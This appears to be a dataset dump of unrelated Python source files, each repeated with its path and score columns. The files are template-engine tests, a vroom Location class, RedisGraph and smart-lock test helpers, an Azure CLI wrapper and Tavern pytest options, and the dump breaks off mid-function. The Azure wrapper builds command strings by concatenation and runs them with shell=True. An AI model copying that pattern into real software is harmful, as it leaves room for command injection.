def getit(self):
"""Return it."""
return self.it
obj = Complex(it={'x': "Hello", 'y': 0})
tryRender(
"@"
"{% if obj.getit.x %}X{% endif %}"
"{% if obj.getit.y %}Y{% endif %}"
"{% if obj.getit.y|str %}S{% endif %}"
"!",
{'obj': obj, 'str': str},
"@XS!"
)
def test_loop_if():
tryRender(
"@{% for n in nums %}{% if n %}Z{% endif %}{{n}}{% endfor %}!",
{'nums': [0, 1, 2]},
"@0Z1Z2!"
)
tryRender(
"X{%if nums%}@{% for n in nums %}{{n}}{% endfor %}{%endif%}!",
{'nums': [0, 1, 2]},
"X@012!"
)
tryRender(
"X{%if nums%}@{% for n in nums %}{{n}}{% endfor %}{%endif%}!",
{'nums': []},
"X!"
)
def test_nested_loops():
tryRender(
"@"
"{% for n in nums %}"
"{% for a in abc %}{{a}}{{n}}{% endfor %}"
"{% endfor %}"
"!",
{'nums': [0, 1, 2], 'abc': ['a', 'b', 'c']},
"@a0b0c0a1b1c1a2b2c2!"
)
def test_exception_during_evaluation():
with pytest.raises(TypeError):
tryRender("Hey {{foo.bar.baz}} there", {'foo': None}, "Hey ??? there")
def test_bad_names():
assertSyntaxError("Wat: {{ var%&!@ }}", {}, "The param's name is invalid.: 'var%&!@'")
assertSyntaxError("Wat: {{ foo|filter%&!@ }}", {}, "The param's name is invalid.: 'filter%&!@'")
assertSyntaxError("Wat: {% for @ in x %}{% endfor %}", {}, "The param's name is invalid.: '@'")
def test_bogus_tag_syntax():
assertSyntaxError("Huh: {% bogus %}!!{% endbogus %}??", {}, "Don't understand tag: 'bogus'")
def test_malformed_if():
assertSyntaxError("Buh? {% if %}hi!{% endif %}", {}, "Invalid If Statement: '{% if %}'")
assertSyntaxError("Buh? {% if this or that %}hi!{% endif %}", {}, "Invalid If Statement: '{% if this or that %}'")
def test_malformed_for():
assertSyntaxError("Weird: {% for %}loop{% endfor %}", {}, "Invalid For Statement: '{% for %}'")
assertSyntaxError("Weird: {% for x from y %}loop{% endfor %}", {}, "Invalid For Statement: '{% for x from y %}'")
assertSyntaxError("Weird: {% for x, y in z %}loop{% endfor %}", {}, "Invalid For Statement: '{% for x, y in z %}'")
def test_bad_nesting():
assertSyntaxError("{% if x %}X", {}, "Unmatched action tag: 'if'")
assertSyntaxError("{% if x %}X{% endfor %}", {}, "Mismatched end tag: 'for'")
assertSyntaxError("{% if x %}{% endif %}{% endif %}", {}, "Too many ends: '{% endif %}'")
def test_malformed_end():
assertSyntaxError("{% if x %}X{% end if %}", {}, "Invalid End Statement: '{% end if %}'")
assertSyntaxError("{% if x %}X{% endif now %}", {}, "Invalid End Statement: '{% endif now %}'")
class AnyOldObject:
def __init__(self, **attrs):
for k, v in attrs.items():
setattr(self, k, v)
| 0.397237 | 0.358437 |
from __future__ import annotations
from typing import Sequence, Tuple, Union
from . import _vroom
class LocationIndex(_vroom.Location):
"""Index in the custom duration matrix for where to find distances.
Attributes:
index:
Location index referring to column in the duration
matrix.
Args:
index:
Location index referring to column in the duration
matrix.
location:
Other location with `index` attribute to make a copy of.
Examples:
>>> loc = LocationIndex(4)
>>> loc
vroom.LocationIndex(4)
>>> loc.index
4
See also:
:cls:`vroom.Location`
"""
def __init__(
self,
index: Union[int, Location],
) -> None:
if isinstance(index, _vroom.Location):
if not index._user_index():
name = index.__class__.__name__
raise TypeError(f"Can not convert {name} to LocationIndex")
index = index._index()
assert isinstance(index, int)
_vroom.Location.__init__(self, index)
assert not self._has_coordinates()
@property
def index(self) -> int:
"""Location index."""
return self._index()
def __repr__(self) -> str:
return f"vroom.{self.__class__.__name__}({self.index})"
class LocationCoordinates(_vroom.Location):
"""Location longitude and latitude.
Attributes:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
Args:
coords:
Longitude and latitude coordinate.
location:
Other location with `coords` attribute to make a copy of.
Examples:
>>> loc = LocationCoordinates([2., 3.])
>>> loc
vroom.LocationCoordinates((2.0, 3.0))
>>> loc.coords
(2.0, 3.0)
See also:
:cls:`vroom.Location`
"""
def __init__(
self,
coords: Union[Location, Sequence[float]],
) -> None:
if isinstance(coords, _vroom.Location):
if not coords._has_coordinates():
name = coords.__class__.__name__
raise TypeError(f"Can not convert {name} to LocationCoordinates")
coords = [coords._lon(), coords._lat()]
assert isinstance(coords, Sequence)
coords = [float(coord) for coord in coords]
assert len(coords) == 2
_vroom.Location.__init__(self, coords=coords)
assert self._has_coordinates()
assert not self._user_index()
@property
def coords(self) -> Tuple[float, float]:
"""Location longitude and latitude."""
return self._lon(), self._lat()
def __repr__(self):
return f"vroom.{self.__class__.__name__}({self.coords})"
class Location(LocationIndex, LocationCoordinates):
"""Location for where a job needs to e done.
Either as an index referring to a column in the durations matrix, or as
longitude-latitude coordinates.
Converts to :cls:`LocationCoordinates` if no `index` is provided, and to
:cls:`LocationIndex` if not `coords` is provided.
Attributes:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
Args:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
location:
Other location to make a smart copy of.
Examples:
>>> loc = vroom.Location(index=4, coords=(7., 8.))
>>> loc
vroom.Location(index=4, coords=(7.0, 8.0))
>>> loc.index, loc.coords
(4, (7.0, 8.0))
>>> vroom.Location(4)
vroom.LocationIndex(4)
>>> vroom.Location((7., 8.))
vroom.LocationCoordinates((7.0, 8.0))
See also:
:cls:`vroom.LocationIndex`, :cls:`vroom.LocationCoordinates`
"""
__init__ = _vroom.Location.__init__
def __new__(
cls,
*args,
**kwargs,
):
if cls is Location and len(args) + len(kwargs) == 1:
# extract args from Location{,Index,Coordinates}
if args and isinstance(args[0], _vroom.Location):
args, [loc] = (), args
if loc._user_index():
args += (loc._index(),)
if loc._has_coordinates():
args += ([loc._lon(), loc._lat()],)
# single positional int -> LocationIndex
if "index" in kwargs or args and isinstance(args[0], int):
instance = _vroom.Location.__new__(LocationIndex, *args, **kwargs)
instance.__init__(*args, **kwargs)
return instance
# single positional sequence -> LocationCoordinates
elif "coords" in kwargs or args and isinstance(args[0], Sequence) and len(args[0]) == 2:
instance = _vroom.Location.__new__(LocationCoordinates, *args, **kwargs)
instance.__init__(*args, **kwargs)
return instance
return _vroom.Location.__new__(cls, *args, **kwargs)
def __repr__(self) -> str:
args = f"index={self.index}, coords={self.coords}"
return f"vroom.{self.__class__.__name__}({args})"
|
src/vroom/location.py
|
from __future__ import annotations
from typing import Sequence, Tuple, Union
from . import _vroom
class LocationIndex(_vroom.Location):
"""Index in the custom duration matrix for where to find distances.
Attributes:
index:
Location index referring to column in the duration
matrix.
Args:
index:
Location index referring to column in the duration
matrix.
location:
Other location with `index` attribute to make a copy of.
Examples:
>>> loc = LocationIndex(4)
>>> loc
vroom.LocationIndex(4)
>>> loc.index
4
See also:
:cls:`vroom.Location`
"""
def __init__(
self,
index: Union[int, Location],
) -> None:
if isinstance(index, _vroom.Location):
if not index._user_index():
name = index.__class__.__name__
raise TypeError(f"Can not convert {name} to LocationIndex")
index = index._index()
assert isinstance(index, int)
_vroom.Location.__init__(self, index)
assert not self._has_coordinates()
@property
def index(self) -> int:
"""Location index."""
return self._index()
def __repr__(self) -> str:
return f"vroom.{self.__class__.__name__}({self.index})"
class LocationCoordinates(_vroom.Location):
"""Location longitude and latitude.
Attributes:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
Args:
coords:
Longitude and latitude coordinate.
location:
Other location with `coords` attribute to make a copy of.
Examples:
>>> loc = LocationCoordinates([2., 3.])
>>> loc
vroom.LocationCoordinates((2.0, 3.0))
>>> loc.coords
(2.0, 3.0)
See also:
:cls:`vroom.Location`
"""
def __init__(
self,
coords: Union[Location, Sequence[float]],
) -> None:
if isinstance(coords, _vroom.Location):
if not coords._has_coordinates():
name = coords.__class__.__name__
raise TypeError(f"Can not convert {name} to LocationCoordinates")
coords = [coords._lon(), coords._lat()]
assert isinstance(coords, Sequence)
coords = [float(coord) for coord in coords]
assert len(coords) == 2
_vroom.Location.__init__(self, coords=coords)
assert self._has_coordinates()
assert not self._user_index()
@property
def coords(self) -> Tuple[float, float]:
"""Location longitude and latitude."""
return self._lon(), self._lat()
def __repr__(self):
return f"vroom.{self.__class__.__name__}({self.coords})"
class Location(LocationIndex, LocationCoordinates):
"""Location for where a job needs to e done.
Either as an index referring to a column in the durations matrix, or as
longitude-latitude coordinates.
Converts to :cls:`LocationCoordinates` if no `index` is provided, and to
:cls:`LocationIndex` if not `coords` is provided.
Attributes:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
Args:
index:
Location index referring to column in the duration
matrix.
coords:
Longitude and latitude coordinate.
location:
Other location to make a smart copy of.
Examples:
>>> loc = vroom.Location(index=4, coords=(7., 8.))
>>> loc
vroom.Location(index=4, coords=(7.0, 8.0))
>>> loc.index, loc.coords
(4, (7.0, 8.0))
>>> vroom.Location(4)
vroom.LocationIndex(4)
>>> vroom.Location((7., 8.))
vroom.LocationCoordinates((7.0, 8.0))
See also:
:cls:`vroom.LocationIndex`, :cls:`vroom.LocationCoordinates`
"""
__init__ = _vroom.Location.__init__
def __new__(
cls,
*args,
**kwargs,
):
if cls is Location and len(args) + len(kwargs) == 1:
# extract args from Location{,Index,Coordinates}
if args and isinstance(args[0], _vroom.Location):
args, [loc] = (), args
if loc._user_index():
args += (loc._index(),)
if loc._has_coordinates():
args += ([loc._lon(), loc._lat()],)
# single positional int -> LocationIndex
if "index" in kwargs or args and isinstance(args[0], int):
instance = _vroom.Location.__new__(LocationIndex, *args, **kwargs)
instance.__init__(*args, **kwargs)
return instance
# single positional sequence -> LocationCoordinates
elif "coords" in kwargs or args and isinstance(args[0], Sequence) and len(args[0]) == 2:
instance = _vroom.Location.__new__(LocationCoordinates, *args, **kwargs)
instance.__init__(*args, **kwargs)
return instance
return _vroom.Location.__new__(cls, *args, **kwargs)
def __repr__(self) -> str:
args = f"index={self.index}, coords={self.coords}"
return f"vroom.{self.__class__.__name__}({args})"
| 0.968186 | 0.662455 |
import os
import warnings
from RLTest import Env
class FlowTestsBase(object):
def __init__(self):
self.env = Env()
redis_con = self.env.getConnection()
redis_con.execute_command("FLUSHALL")
def _assert_equalish(self, a, b, e=0.05):
delta = a * e
diff = abs(a-b)
if diff > delta:
warnings.warn('runtimes differ by more than \"%f\" percent' % e)
def _assert_only_expected_results_are_in_actual_results(self,
actual_result,
query_info):
actual_result_set = []
if actual_result.result_set is not None:
actual_result_set = actual_result.result_set
# Assert number of results.
self.env.assertEqual(len(actual_result_set), len(query_info.expected_result))
# Assert actual values vs expected values.
for res in query_info.expected_result:
self.env.assertIn(res, actual_result_set)
def _assert_actual_results_contained_in_expected_results(self,
actual_result,
query_info,
num_contained_results):
actual_result_set = actual_result.result_set
# Assert num results.
self.env.assertEqual(len(actual_result_set), num_contained_results)
# Assert actual values vs expected values.
expected_result = query_info.expected_result
count = len([res for res in expected_result if res in actual_result_set])
# Assert number of different results is as expected.
self.env.assertEqual(count, num_contained_results)
def _assert_run_time(self, actual_result, query_info):
if actual_result.run_time_ms > query_info.max_run_time_ms:
warnings.warn('Maximum runtime for query \"%s\" was: %s, but should be %s' %
(query_info.description, str(actual_result.run_time_ms), str(query_info.max_run_time_ms)))
|
tests/flow/base.py
|
import os
import warnings
from RLTest import Env
class FlowTestsBase(object):
def __init__(self):
self.env = Env()
redis_con = self.env.getConnection()
redis_con.execute_command("FLUSHALL")
def _assert_equalish(self, a, b, e=0.05):
delta = a * e
diff = abs(a-b)
if diff > delta:
warnings.warn('runtimes differ by more than \"%f\" percent' % e)
def _assert_only_expected_results_are_in_actual_results(self,
actual_result,
query_info):
actual_result_set = []
if actual_result.result_set is not None:
actual_result_set = actual_result.result_set
# Assert number of results.
self.env.assertEqual(len(actual_result_set), len(query_info.expected_result))
# Assert actual values vs expected values.
for res in query_info.expected_result:
self.env.assertIn(res, actual_result_set)
def _assert_actual_results_contained_in_expected_results(self,
actual_result,
query_info,
num_contained_results):
actual_result_set = actual_result.result_set
# Assert num results.
self.env.assertEqual(len(actual_result_set), num_contained_results)
# Assert actual values vs expected values.
expected_result = query_info.expected_result
count = len([res for res in expected_result if res in actual_result_set])
# Assert number of different results is as expected.
self.env.assertEqual(count, num_contained_results)
def _assert_run_time(self, actual_result, query_info):
if actual_result.run_time_ms > query_info.max_run_time_ms:
warnings.warn('Maximum runtime for query \"%s\" was: %s, but should be %s' %
(query_info.description, str(actual_result.run_time_ms), str(query_info.max_run_time_ms)))
| 0.54698 | 0.336713 |
from __future__ import annotations
from aioresponses import aioresponses
from bold_smart_lock.auth import Auth
from bold_smart_lock.const import API_URI, AUTHENTICATIONS_ENDPOINT, POST_HEADERS, VALIDATIONS_ENDPOINT
import aiohttp
import json
import os
def load_fixture(filename: str, raw: bool = False):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path) as fdp:
return fdp.read() if raw else json.loads(fdp.read())
fixture_authenticate_request: dict[str, str] = load_fixture("authenticate_request.json")
fixture_request_validation_id_response: dict[str, str] = load_fixture("request_validation_id_response.json")
fixture_verify_validation_id_response: dict[str, str] = load_fixture("verify_validation_id_response.json")
fixture_authenticate_response: dict[str, str] = load_fixture("authenticate_response.json")
async def mock_auth_authenticate(
mock_request_validation_id_response: list = None,
mock_fixture_verify_validation_id_response: list = None,
mock_authenticate_reponse: list = None,
mock_auth: Auth = None,
mock_session: aiohttp.ClientSession = None
) -> dict[str, str]:
"""Helper to set mocking for request+verify validation id and authenticate calls"""
with aioresponses() as m:
if mock_request_validation_id_response:
m.post(
API_URI + VALIDATIONS_ENDPOINT,
headers=POST_HEADERS,
status=mock_request_validation_id_response[0] or 200,
payload=mock_request_validation_id_response[1] or fixture_request_validation_id_response,
)
if mock_fixture_verify_validation_id_response:
m.post(
API_URI + VALIDATIONS_ENDPOINT + "/" + fixture_request_validation_id_response["id"],
headers=POST_HEADERS,
status=mock_fixture_verify_validation_id_response[0] or 200,
payload=mock_fixture_verify_validation_id_response[1] or fixture_verify_validation_id_response,
)
if mock_authenticate_reponse:
m.post(
API_URI + AUTHENTICATIONS_ENDPOINT,
headers=POST_HEADERS,
status=mock_authenticate_reponse[0] or 200,
payload=mock_authenticate_reponse[1] or fixture_authenticate_response,
)
try:
session = mock_session or aiohttp.ClientSession()
auth = mock_auth or Auth(session)
return await auth.authenticate(
fixture_authenticate_request["email"],
fixture_authenticate_request["password"],
fixture_authenticate_request["validation_code"],
fixture_authenticate_request["validation_id"]
)
except Exception as exception:
raise exception
finally:
await session.close()
async def mock_auth_request_validation_id(
status: int = 200,
verification_method: str = "email",
headers: str = "application/json",
response: dict[str, str] = fixture_request_validation_id_response,
) -> dict[str, str]:
"""Helper to set mocking for request_validation_id calls"""
with aioresponses() as m:
m.post(
API_URI + VALIDATIONS_ENDPOINT,
headers=headers or POST_HEADERS,
status=status,
payload=response,
)
try:
session = aiohttp.ClientSession()
auth = Auth(session)
return await auth.request_validation_id(
fixture_authenticate_request["email"] if verification_method == "email" else fixture_authenticate_request["phone"],
)
except Exception as exception:
raise exception
finally:
await session.close()
|
tests/helpers.py
|
from __future__ import annotations
from aioresponses import aioresponses
from bold_smart_lock.auth import Auth
from bold_smart_lock.const import API_URI, AUTHENTICATIONS_ENDPOINT, POST_HEADERS, VALIDATIONS_ENDPOINT
import aiohttp
import json
import os
def load_fixture(filename: str, raw: bool = False):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
with open(path) as fdp:
return fdp.read() if raw else json.loads(fdp.read())
fixture_authenticate_request: dict[str, str] = load_fixture("authenticate_request.json")
fixture_request_validation_id_response: dict[str, str] = load_fixture("request_validation_id_response.json")
fixture_verify_validation_id_response: dict[str, str] = load_fixture("verify_validation_id_response.json")
fixture_authenticate_response: dict[str, str] = load_fixture("authenticate_response.json")
async def mock_auth_authenticate(
mock_request_validation_id_response: list = None,
mock_fixture_verify_validation_id_response: list = None,
mock_authenticate_reponse: list = None,
mock_auth: Auth = None,
mock_session: aiohttp.ClientSession = None
) -> dict[str, str]:
"""Helper to set mocking for request+verify validation id and authenticate calls"""
with aioresponses() as m:
if mock_request_validation_id_response:
m.post(
API_URI + VALIDATIONS_ENDPOINT,
headers=POST_HEADERS,
status=mock_request_validation_id_response[0] or 200,
payload=mock_request_validation_id_response[1] or fixture_request_validation_id_response,
)
if mock_fixture_verify_validation_id_response:
m.post(
API_URI + VALIDATIONS_ENDPOINT + "/" + fixture_request_validation_id_response["id"],
headers=POST_HEADERS,
status=mock_fixture_verify_validation_id_response[0] or 200,
payload=mock_fixture_verify_validation_id_response[1] or fixture_verify_validation_id_response,
)
if mock_authenticate_reponse:
m.post(
API_URI + AUTHENTICATIONS_ENDPOINT,
headers=POST_HEADERS,
status=mock_authenticate_reponse[0] or 200,
payload=mock_authenticate_reponse[1] or fixture_authenticate_response,
)
try:
session = mock_session or aiohttp.ClientSession()
auth = mock_auth or Auth(session)
return await auth.authenticate(
fixture_authenticate_request["email"],
fixture_authenticate_request["password"],
fixture_authenticate_request["validation_code"],
fixture_authenticate_request["validation_id"]
)
except Exception as exception:
raise exception
finally:
await session.close()
async def mock_auth_request_validation_id(
status: int = 200,
verification_method: str = "email",
headers: str = "application/json",
response: dict[str, str] = fixture_request_validation_id_response,
) -> dict[str, str]:
"""Helper to set mocking for request_validation_id calls"""
with aioresponses() as m:
m.post(
API_URI + VALIDATIONS_ENDPOINT,
headers=headers or POST_HEADERS,
status=status,
payload=response,
)
try:
session = aiohttp.ClientSession()
auth = Auth(session)
return await auth.request_validation_id(
fixture_authenticate_request["email"] if verification_method == "email" else fixture_authenticate_request["phone"],
)
except Exception as exception:
raise exception
finally:
await session.close()
| 0.61115 | 0.102709 |
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def show(resource_group, profile_name, endpoint_name):
params = get_params(locals())
command = "az afd endpoint show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(resource_group, profile_name):
params = get_params(locals())
command = "az afd endpoint list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def purge(resource_group, profile_name, endpoint_name, content_paths, domains=None, no_wait=None):
params = get_params(locals())
command = "az afd endpoint purge " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, profile_name, endpoint_name, yes=None):
params = get_params(locals())
command = "az afd endpoint delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, profile_name, endpoint_name, origin_response_timeout_seconds=None, enabled_state=None, tags=None):
params = get_params(locals())
command = "az afd endpoint update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def create(resource_group, profile_name, endpoint_name, origin_response_timeout_seconds, enabled_state, tags=None):
params = get_params(locals())
command = "az afd endpoint create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
|
test/pyaz/afd/endpoint/__init__.py
|
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def show(resource_group, profile_name, endpoint_name):
params = get_params(locals())
command = "az afd endpoint show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(resource_group, profile_name):
params = get_params(locals())
command = "az afd endpoint list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def purge(resource_group, profile_name, endpoint_name, content_paths, domains=None, no_wait=None):
params = get_params(locals())
command = "az afd endpoint purge " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, profile_name, endpoint_name, yes=None):
params = get_params(locals())
command = "az afd endpoint delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, profile_name, endpoint_name, origin_response_timeout_seconds=None, enabled_state=None, tags=None):
params = get_params(locals())
command = "az afd endpoint update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def create(resource_group, profile_name, endpoint_name, origin_response_timeout_seconds, enabled_state, tags=None):
params = get_params(locals())
command = "az afd endpoint create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 0.209712 | 0.062245 |
from attr import attrib, NOTHING
from related import _init_fields, types
from collections import OrderedDict
from .converters import to_sequence_field_w_str, to_leaf_mapping_field, to_eval_str, identity
from . import dispatchers # to load the dispatcher
class UNSPECIFIED(object):
pass
def AnyField(default=NOTHING, required=True, repr=True):
"""
Just pass through the field, using default yaml conversion to python objects
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, UNSPECIFIED())
return attrib(default=default, converter=None, validator=None,
repr=repr)
def StrSequenceField(cls, default=NOTHING, required=True, repr=True):
"""
Create new sequence field on a model. If only string is present,
convert it to a list of length 1.
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, [])
# check that it's not sequence
converter = to_sequence_field_w_str(cls)
validator = _init_fields.init_validator(required, types.TypedSequence)
# kw convert is deprecated
try:
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
except TypeError:
return attrib(default=default, convert=converter, validator=validator,
repr=repr)
def NestedMappingField(cls, keyword, key, default=NOTHING, required=True, repr=False):
"""
Create new sequence field on a model. If only string is present,
convert it to a list of length 1.
:param cls: class (or name) of the model to be related in Sequence.
:param keyword: stopping condition in recursion (indicator that cls has been found)
:param key: key field on the child object to be used as the mapping key.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, OrderedDict())
# check that it's not sequence
converter = to_leaf_mapping_field(cls, keyword, key)
# validator = _init_fields.init_validator(required, types.TypedSequence)
validator = None
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
def TupleIntField(default=NOTHING, required=True, repr=True):
"""
Create new tuple field on a model. Convert it first to a string
and then to a tuple
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, tuple)
converter = to_eval_str
validator = _init_fields.init_validator(required, tuple)
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
|
kipoi_utils/external/related/fields.py
|
from attr import attrib, NOTHING
from related import _init_fields, types
from collections import OrderedDict
from .converters import to_sequence_field_w_str, to_leaf_mapping_field, to_eval_str, identity
from . import dispatchers # to load the dispatcher
class UNSPECIFIED(object):
pass
def AnyField(default=NOTHING, required=True, repr=True):
"""
Just pass through the field, using default yaml conversion to python objects
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, UNSPECIFIED())
return attrib(default=default, converter=None, validator=None,
repr=repr)
def StrSequenceField(cls, default=NOTHING, required=True, repr=True):
"""
Create new sequence field on a model. If only string is present,
convert it to a list of length 1.
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, [])
# check that it's not sequence
converter = to_sequence_field_w_str(cls)
validator = _init_fields.init_validator(required, types.TypedSequence)
# kw convert is deprecated
try:
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
except TypeError:
return attrib(default=default, convert=converter, validator=validator,
repr=repr)
def NestedMappingField(cls, keyword, key, default=NOTHING, required=True, repr=False):
"""
Create new sequence field on a model. If only string is present,
convert it to a list of length 1.
:param cls: class (or name) of the model to be related in Sequence.
:param keyword: stopping condition in recursion (indicator that cls has been found)
:param key: key field on the child object to be used as the mapping key.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, OrderedDict())
# check that it's not sequence
converter = to_leaf_mapping_field(cls, keyword, key)
# validator = _init_fields.init_validator(required, types.TypedSequence)
validator = None
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
def TupleIntField(default=NOTHING, required=True, repr=True):
"""
Create new tuple field on a model. Convert it first to a string
and then to a tuple
:param cls: class (or name) of the model to be related in Sequence.
:param default: any TypedSequence or list
:param bool required: whether or not the object is invalid if not provided.
:param bool repr: include this field should appear in object's repr.
:param bool cmp: include this field in generated comparison.
"""
default = _init_fields.init_default(required, default, tuple)
converter = to_eval_str
validator = _init_fields.init_validator(required, tuple)
return attrib(default=default, converter=converter, validator=validator,
repr=repr)
| 0.777807 | 0.264563 |
from functools import lru_cache
import logging
import os
from box import Box
from tavern.util.dict_util import format_keys
from tavern.util.general import load_global_config
from tavern.util.strict_util import StrictLevel
logger = logging.getLogger(__name__)
def add_parser_options(parser_addoption, with_defaults=True):
"""Add argparse options
This is shared between the CLI and pytest (for now)
See also testutils.pytesthook.hooks.pytest_addoption
"""
parser_addoption(
"--tavern-global-cfg",
help="One or more global configuration files to include in every test",
nargs="+",
)
parser_addoption(
"--tavern-http-backend",
help="Which http backend to use",
default="requests" if with_defaults else None,
)
parser_addoption(
"--tavern-mqtt-backend",
help="Which mqtt backend to use",
default="paho-mqtt" if with_defaults else None,
)
parser_addoption(
"--tavern-strict",
help="Default response matching strictness",
default=None,
nargs="+",
choices=["json", "headers", "redirect_query_params"],
)
parser_addoption(
"--tavern-use-default-traceback",
help="Use normal python-style traceback",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-always-follow-redirects",
help="Always follow HTTP redirects",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
action="store",
nargs=1,
)
parser_addoption(
"--tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
action="store_true",
)
def add_ini_options(parser):
"""Add an option to pass in a global config file for tavern
See also testutils.pytesthook.util.add_parser_options
"""
parser.addini(
"tavern-global-cfg",
help="One or more global configuration files to include in every test",
type="linelist",
default=[],
)
parser.addini(
"tavern-http-backend", help="Which http backend to use", default="requests"
)
parser.addini(
"tavern-mqtt-backend", help="Which mqtt backend to use", default="paho-mqtt"
)
parser.addini(
"tavern-strict",
help="Default response matching strictness",
type="args",
default=None,
)
parser.addini(
"tavern-use-default-traceback",
help="Use normal python-style traceback",
type="bool",
default=False,
)
parser.addini(
"tavern-always-follow-redirects",
help="Always follow HTTP redirects",
type="bool",
default=False,
)
parser.addini(
"tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
type="args",
)
parser.addini(
"tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
type="bool",
)
@lru_cache()
def load_global_cfg(pytest_config):
"""Load globally included config files from cmdline/cfg file arguments
Args:
pytest_config (pytest.Config): Pytest config object
Returns:
dict: variables/stages/etc from global config files
Raises:
exceptions.UnexpectedKeysError: Invalid settings in one or more config
files detected
"""
# Load ini first
